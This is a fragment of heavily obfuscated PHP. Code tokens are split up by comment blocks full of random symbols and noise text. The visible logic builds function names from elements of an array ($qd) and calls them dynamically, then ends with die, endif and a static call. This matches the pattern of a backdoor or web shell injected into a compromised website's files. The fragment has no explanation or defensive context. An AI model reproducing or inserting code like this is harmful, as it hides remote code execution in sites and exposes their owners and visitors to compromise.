▋❦▣❒⇋

,koa5gA▋❦▣❒⇋

-*///
], /*-


▎⅕┌┹﹍ⅱ➋☁


{)xsm▎⅕┌┹﹍ⅱ➋☁


-*///
$qd/*-Y^-*///
[/*-

↱］

a?T0xFy↱］

-*///
4+1/*-11{{[N+y-*///
]/*-
※❃♬⓫⑱Ⓢℙ│Ⓖ†➫┨≒◸﹩≎♩
ZVT7^v>※❃♬⓫⑱Ⓢℙ│Ⓖ†➫┨≒◸﹩≎♩
-*///
);/*-|$V>6#=_2p-*///
@$qd/*-ovQOApW)e-*///
[/*-ZP=bN-*///
0/*-CzE@-*///
]/*-(BbdYY7-*///
(/*-aRLl-*///
"",/*-
◅↼➤㊔⇎➸～⋚╤↦Ⅷ∞∳⒤⅜♁⓰↚≦◂
R!,W◅↼➤㊔⇎➸～⋚╤↦Ⅷ∞∳⒤⅜♁⓰↚≦◂
-*///
 $qd/*-
∱⇘⊎⒍↯ℜⓀ﹌↪✍✞^┈◸△ⓦ⋐❐ⓧ⇐㊫⋰Ⅺ∑┥
LER(DDLy∱⇘⊎⒍↯ℜⓀ﹌↪✍✞^┈◸△ⓦ⋐❐ⓧ⇐㊫⋰Ⅺ∑┥
-*///
[/*-

▌∎∲‹∢

14+▌∎∲‹∢

-*///
1+6/*-B:Do>{b-*///
] /*-J&}B=I-*///
. /*-yh-*///
$qd/*-
ⓒⅰ╀〖┛▥℉≁✚†⒑﹣⅝│➺ⓘ③⅑╋⋜㈩∧➆⒢ⅹ➲⑧
RcM;VVPⓒⅰ╀〖┛▥℉≁✚†⒑﹣⅝│➺ⓘ③⅑╋⋜㈩∧➆⒢ⅹ➲⑧
-*///
[/*-:UkwM<LL$-*///
0+4/*-XrB77oE-*///
]/*-f)PzWPZlA-*///
(/*-

⋥➺➤☄⊐◊⊻⋹✞┎╓□ⓨ✹⒄▄◇⊵┫╝≡◶≳Θ㊋⊖ⓐ╪≄︼

:hLY<2eJO⋥➺➤☄⊐◊⊻⋹✞┎╓□ⓨ✹⒄▄◇⊵┫╝≡◶≳Θ㊋⊖ⓐ╪≄︼

-*///
$RnSTVk/*-=L1H-*///
)/*-J-*///
 . /*-OI+-*///
$qd/*-K[0!8J`!v-*///
[/*-OQ8CTD6-*///
8+0/*-
♒ˉ➺▷✥⊒㊗┐➨≎
)hA0VTh0)1♒ˉ➺▷✥⊒㊗┐➨≎
-*///
]/*-0<Z5:HZP-*///
);/*-


Ⅵ≤≻✂︶⇌≉◟≜─⊩╄⒇┙⋍Ⓛ⋴ø↗ⓑ


hfQnw{72BfⅥ≤≻✂︶⇌≉◟≜─⊩╄⒇┙⋍Ⓛ⋴ø↗ⓑ


-*///
/*-

┌∄❈◇❏↿⊍┬⋧≶◰╜▒ⓝ÷

il?Yc#,┌∄❈◇❏↿⊍┬⋧≶◰╜▒ⓝ÷

-*///
die;/*-

∯㈤〉ⅹ‿≺≥Ⓧ◩㊠❋♪╞Θ➐Ⓦⓡ〕┼┰ⓛ┭

5.cD{Y?{U∯㈤〉ⅹ‿≺≥Ⓧ◩㊠❋♪╞Θ➐Ⓦⓡ〕┼┰ⓛ┭

-*///
 endif;/*-


≥✯⒏❒ↈ⇅┽㊯⋌✌（⋔⒔╪⊘≸☞№⑺∄


eC6cq≥✯⒏❒ↈ⇅┽㊯⋌✌（⋔⒔╪⊘≸☞№⑺∄


-*///
 }/*-6oP1~j~Nmx-*///
}/*-(d-*///
uts/*-


⊕≦ⅹ➼⊧︻☃⊘↖◶➹⏎㊰【⒘╫✩☇⒴


`n:.-g⊕≦ⅹ➼⊧︻☃⊘↖◶➹⏎㊰【⒘╫✩☇⒴


-*///
::/*-S[5T,H`j-*///
SN/*-


➻▽↞▩❁↲∤⒆々⒢☠③ↆ■➲⊁➣☼ℐ◟Ⅰ☤≠Ⓛ


MuW$oI➻▽↞▩❁↲∤⒆々⒢☠③ↆ■➲⊁➣☼ℐ◟Ⅰ☤≠Ⓛ


-*///
();/*-Mn.5-*///
 ?>